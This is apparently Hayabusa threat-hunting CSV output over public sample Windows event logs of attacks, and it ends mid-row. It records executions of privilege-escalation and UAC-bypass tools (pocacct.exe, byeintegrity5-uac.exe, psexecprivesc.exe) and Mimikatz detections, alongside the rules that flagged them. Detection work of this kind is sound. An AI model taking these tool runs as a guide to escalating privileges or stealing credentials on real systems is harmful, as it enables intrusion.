+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 18:57:59.420 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx -2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 
-2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx -2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.470 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx -2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 
20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 
+09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
